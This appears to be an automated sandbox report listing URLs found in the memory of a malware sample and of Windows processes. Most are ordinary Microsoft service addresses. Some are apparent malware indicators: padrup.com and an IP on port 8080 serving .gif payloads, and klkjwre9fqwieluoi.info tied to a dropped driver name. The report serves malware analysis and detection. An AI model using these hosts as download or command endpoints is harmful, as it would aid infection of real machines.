            Source: PfBjDhHzvV.exe, 00000000.00000002.2241468768.0000000003EBB000.00000004.00000010.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2236989876.0000000000C93000.00000004.10000000.00040000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368382163.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000003.1368144994.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2235952393.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2239052487.00000000011B9000.00000004.00000010.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001D.00000002.2674188506.00000000024D3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001E.00000002.2680528942.0000000002633000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001F.00000002.2675030035.00000000023B3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000020.00000002.2659610605.0000000000DE3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000021.00000002.2643179759.0000000000363000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000022.00000002.2678320117.0000000002EC3000.00000004.10000000.00040000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2713401139.0000000002859000.00000004.00000010.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2707649439.0000000002713000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gifhttp://190.120.227.91:8080/sobakavolos.gif
            Source: faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2713401139.0000000002859000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gifhttp://190.120.227.91:8080/sobakavolos.gifFDC3C2625A60E29DB5AF20451090A
            Source: SearchApp.exe, 0000000F.00000000.1588671349.000001F4AE1F6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schema.skype.com/Mention
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.Component.WebApi.ClientConditionsProcessor
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Catalog
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Catalogp
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.PaymentInstruments
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.PaymentInstrumentsp
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Profile
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Profilep
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Purchase
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Purchasep
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.StoreEdge
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.StoreEdgep
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchase.DataModelp
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Store.Purchasep
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Collections.Generic
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Collections.Genericp
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Windows.Web.Http
            Source: SearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.live.com/Web/
            Source: explorer.exe, 0000000A.00000002.2928181034.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1448330097.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1449558403.0000000008820000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000E.00000000.1529627936.00000269817E0000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 00000012.00000000.1706581163.0000018570620000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: PfBjDhHzvV.exe, 00000000.00000002.2234098770.000000000040D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.apache.org/
            Source: PfBjDhHzvV.exe, PfBjDhHzvV.exe, 00000000.00000002.2234177696.0000000000415000.00000002.00000001.01000000.00000003.sdmp, PfBjDhHzvV.exe, 00000000.00000002.2234330420.0000000000417000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 0000000A.00000003.2275648262.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1455294750.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275779862.000000000C44D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2283066349.000000000C450000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
            Source: PfBjDhHzvV.exe, PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exeString found in binary or memory: http://www.klkjwre9fqwieluoi.info/
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers
            Source: PfBjDhHzvV.exe, 00000000.00000002.2234098770.000000000040D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.zeustech.net/
            Source: svchost.exe, 00000007.00000000.1425650401.0000018CE7268000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
            Source: svchost.exe, 00000007.00000000.1425650401.0000018CE7268000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9720000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000000.1749207020.00000147A9718000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.xboxlive.com/codeOfConduct/
            Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000008F83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
            Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.comt
            Source: SearchApp.exe, 0000000F.00000000.1560312039.000001F49B244000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
            Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1566432203.000001F49BCBA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1544714307.000001EC94D13000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
            Source: SearchApp.exe, 0000000F.00000000.1547534482.000001EC9A36A000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1545849761.000001EC9969A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
            Source: SearchApp.exe, 0000000F.00000000.1561694952.000001F49B4FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/fixsearch
            Source: explorer.exe, 0000000A.00000000.1450832815.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: SearchApp.exe, 0000000F.00000000.1623611969.000001F4AEDC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5
            Source: explorer.exe, 0000000A.00000002.3016089199.0000000008DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 0000000A.00000003.2275899145.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1450832815.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 0000000A.00000002.2800092520.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1446640101.0000000007276000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
            Source: explorer.exe, 0000000A.00000002.3016089199.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275899145.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1450832815.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1543496408.000001EC93096000.00000004.00000001.00020000.00000000.sdmp, TextInputHost.exe, 00000018.00000000.1758664936.00000177A5943000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
            Source: svchost.exe, 00000007.00000000.1425650401.0000018CE7268000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.actiP
            Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
            Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
            Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
            Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.comLimit
            Source: explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
            Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000008.00000000.1429306447.000001D959F14000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-GB
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9720000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000000.1749207020.00000147A9718000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://da.xboxservices.com/DigitalAttachmentFD/AttachmentRecords
            Source: explorer.exe, 0000000A.00000000.1455294750.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: StartMenuExperienceHost.exe, 0000000D.00000000.1499873714.000001A446400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comp
            Source: SearchApp.exe, 0000000F.00000000.1578862210.000001F49DA23000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfills
            Source: SearchApp.exe, 0000000F.00000000.1561417980.000001F49B420000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfillsThis
            Source: SearchApp.exe, 0000000F.00000000.1561453752.000001F49B440000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcchigh.loki.office365.us/api
            Source: SearchApp.exe, 0000000F.00000000.1590039376.000001F4AE269000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcchigh.loki.office365.us/api/v1/configuration/cortana
            Source: svchost.exe, 00000007.00000000.1425619943.0000018CE7243000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
            Source: SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/
            Source: SearchApp.exe, 0000000F.00000000.1607695646.000001F4AEA4A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/https://substrate.office.comhttps://outlook.office.com/pZ
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
            Source: WinStore.App.exe, 00000016.00000000.1749207020.00000147A9720000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000000.1749207020.00000147A9718000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://live.xbox.com/purchase/xbox/
            Source: SearchApp.exe, 0000000F.00000000.1563059648.000001F49B6D7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1563059648.000001F49B6D7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: WinStore.App.exe, 00000016.00000000.1751253222.00000147C8E02000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
            Source: svchost.exe, 00000007.00000000.1425679854.0000018CE728E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
            Source: WinStore.App.exe, 00000016.00000000.1751253222.00000147C8E02000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.localhttps://login.windows.local/
            Source: svchost.exe, 00000007.00000000.1425679854.0000018CE728E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.localicy
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.localtb1
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1563634217.000001F49B87D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1568868913.000001F49D27C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1568868913.000001F49D27C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
            Source: SearchApp.exe, 0000000F.00000000.1590039376.000001F4AE269000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/cortana
            Source: SearchApp.exe, 0000000F.00000000.1561497256.000001F49B460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api33366b5b-54ef-48bf-819d-677748eae9e33B199897-A63E-44DC-BF20-DF6F6F2
            Source: SearchApp.exe, 0000000F.00000000.1578753735.000001F49DA00000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1574285798.000001F49D827000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1549685571.000001F49A708000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mths.be/fromcodepoint
            Source: SearchApp.exe, 0000000F.00000000.1578437841.000001F49D9E3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/web-widget?form=M
            Source: explorer.exe, 0000000A.00000000.1455294750.000000000C091000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000D.00000000.1500026385.000001A4464C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
            Source: SearchApp.exe, 0000000F.00000000.1608010494.000001F4AEA67000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/owahttps://outlook.office.com/owaCodexChatButtonUpperRight
            Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://outlook.office.com/
            Source: SearchApp.exe, 0000000F.00000000.1561694952.000001F49B4FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/&
            Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1561722325.000001F49B505000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.Access
            Source: SearchApp.exe, 0000000F.00000000.1599317840.000001F4AE716000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.AccessZ
            Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWrite
            Source: SearchApp.exe, 0000000F.00000000.1599565472.000001F4AE720000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWritej
            Source: SearchApp.exe, 0000000F.00000000.1599317840.000001F4AE700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/Z
            Source: SearchApp.exe, 0000000F.00000000.1587591500.000001F4AE17E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/
            Source: SearchApp.exe, 0000000F.00000000.1590039376.000001F4AE269000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/mail/deeplink/attachment/
            Source: explorer.exe, 0000000A.00000000.1455294750.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
            Source: StartMenuExperienceHost.exe, 0000000D.00000000.1499131744.000001A4423E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcemberx
            Source: SearchApp.exe, 0000000F.00000000.1572104541.000001F49D680000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rafd.aRmsDeferhttps://raka.https://r.fRmsDeferhttps://rcf.
            Source: SearchApp.exe, 0000000F.00000000.1578862210.000001F49DA23000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
            Source: smartscreen.exe, 00000014.00000000.1731292437.00000159BD6E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://smartscreen.microsoft.
            Source: SearchApp.exe, 0000000F.00000000.1653277337.000001F4B1510000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1566432203.000001F49BCBA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/
            Source: SearchApp.exe, 0000000F.00000000.1561694952.000001F49B4FD000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1587331376.000001F4AE100000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1578862210.000001F49DA23000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1564687977.000001F49BA00000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1619112858.000001F4AECA2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
            Source: SearchApp.exe, 0000000F.00000000.1617033060.000001F4AEC86000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/M365.Access
            Source: SearchApp.exe, 0000000F.00000000.1607695646.000001F4AEA3E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/M365.Accesshttps://outlook.office.com/User.ReadWrite
            Source: SearchApp.exe, 0000000F.00000000.1606759519.000001F4AE9D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWriteO
            Source: SearchApp.exe, 0000000F.00000000.1562380324.000001F49B5D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWrite_iframe.contentWindow.BingAtWork.work
            Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://substrate.office.com/api/v2.0/Users(
            Source: SearchApp.exe, 0000000F.00000000.1581063668.000001F49DC48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/dsapi/v1.0/
            Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://substrate.office.com/imageB2/v1.0/users/
            Source: SearchApp.exe, 0000000F.00000000.1606759519.000001F4AE9D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/events?scenario=
            Source: SearchApp.exe, 0000000F.00000000.1562196902.000001F49B590000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/queryhttps://substrate.office365.us/search/api/v2/query
            Source: SearchApp.exe, 0000000F.00000000.1581063668.000001F49DC48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office365.us
            Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/api/v2.0/Users(
            Source: SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1637373572.000001F4AF5D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/imageB2/v1.0/users/
            Source: smartscreen.exe, 00000014.00000003.2414981932.00000151ACEC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us
            Source: smartscreen.exe, 00000014.00000003.2414981932.00000151ACEC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us
